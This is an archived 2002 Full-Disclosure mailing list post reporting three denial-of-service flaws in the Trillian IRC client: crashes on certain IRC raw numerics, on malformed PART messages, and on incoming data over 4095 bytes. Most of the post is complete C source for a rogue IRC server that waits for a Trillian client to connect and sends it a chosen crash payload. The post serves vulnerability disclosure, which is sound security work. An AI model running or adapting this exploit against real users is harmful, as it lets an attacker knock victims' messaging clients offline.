OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Lance Fitz-Herbert (fitzies_at_hotmail.com)
Date: Sun Sep 22 2002 - 09:11:07 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    I'm beginning to wonder if the makers of the instant messaging client
    Trillian, have done any bounds checking in their code. Personally I like
    trillian, its a nice peice of software, on the outside.
    Here's three more DoS attacks on trillian, exploitable via a server.
    I've included some code which exploits all three.

    These were tested on version .74, probably older versions are affected tho.

    Multiple Raw flaws:
    -------------------
    There seems to be a flaw in the way trillian proccesses some IRC Raw
    Messages, the following raw's crash Trillian:

    206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367

    The server sends the raws in the format: ':Server <Num>'
    <Num> being the one of the raw codes listed above.

    Part flaw:
    ----------
    If trillian receives a message about a user parting a channel it itself is
    not in, or if no channel is specified at all, trillian will crash.

    Part Messages are sent in the form: ":nick!identaddress PART <Channel>"

    Data buffering flaw:
    --------------------
    There appears to be a flaw in the way trillian buffers data from the IRC
    server. If trillian receives a block of data over 4095 bytes, trillian will
    crash.

    Exploit code to reproduce flaws:
    --------------------------------

    /* Trillian-Dos.c
       Author: Lance Fitz-Herbert
       Contact: IRC: Phrizer, DALnet - #KORP
                ICQ: 23549284

       Exploits Multiple Trillian DoS Flaws:
          Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333,
    352, 367
          Part Flaw
          Data length flaw.

       Tested On Version .74
       Compiles with Borland 5.5 Commandline Tools.

       These Examples Will Just DoS The Trillian Client,
    */

    #include <windows.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <winsock.h>

    SOCKET s;

    #define SERVER ":server "
    #define PART ":nick!identaddress PART\n"

    int main(int argc, char *argv[]) {
            SOCKET TempSock = SOCKET_ERROR;
            WSADATA WsaDat;
            SOCKADDR_IN Sockaddr;
            int nRet;
            char payload[4096];
            if (argc < 2) {
                    usage();
                    return 1;
            }
            if ((!strcmp(argv[1],"raw")) && (argc < 3) || (strcmp(argv[1],"raw")) &&
    (strcmp(argv[1],"part")) && (strcmp(argv[1],"data"))) {
                    usage();
                    return 1;
            }

            printf("Listening on port 6667 for connections....\n");
            if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
                    printf("ERROR: WSA Initialization failed.");
                    return 0;
            }

            /* Create Socket */
            s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
            if (s == INVALID_SOCKET) {
                    printf("ERROR: Could Not Create Socket. Exiting\n");
                    WSACleanup();
                    return 0;
            }

            Sockaddr.sin_port = htons(6667);
            Sockaddr.sin_family = AF_INET;
            Sockaddr.sin_addr.s_addr = INADDR_ANY;

            nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
            if (nRet == SOCKET_ERROR) {
                    printf("ERROR Binding Socket");
                    WSACleanup();
                    return 0;
            }

            /* Make Socket Listen */
            if (listen(s, 10) == SOCKET_ERROR) {
                    printf("ERROR: Couldnt Make Listening Socket\n");
                    WSACleanup();
                    return 0;
            }

            while (TempSock == SOCKET_ERROR) {
                  TempSock = accept(s, NULL, NULL);
            }

            printf("Client Connected, Sending Payload\n");

            if (!strcmp(argv[1],"part")) {
                    send(TempSock,PART,strlen(PART),0);
            }
            if (!strcmp(argv[1],"raw")) {
                    send(TempSock,SERVER,strlen(SERVER),0);
                    send(TempSock,argv[2],strlen(argv[2]),0);
                    send(TempSock,"\n",1,0);
            }
            if (!strcmp(argv[1],"data")) {
                    memset(payload,'A',4096);
                    send(TempSock,payload,strlen(payload),0);
            }
            printf("Exiting\n");
            sleep(100);
            WSACleanup();
            return 0;
    }

    usage() {
                    printf("\nTrillian Multiple DoS Flaws\n");
                    printf("---------------------------\n");
                    printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
                    printf("Tested On Version .74\n\n");
                    printf("Usage: Trillian-Dos <type> [num]\n");
                    printf("Type: raw, part, data\n");
                    printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332,
    333, 352, 367\n\n");
    }

    --end code-- 

    ----
NOTE: Because of the amount of spam i receive, i require all emails directed 
*to me* to contain the word "nospam" in the subject line somewhere. Else i 
might not get your email. thankyou.
----

    _________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspx

    _______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html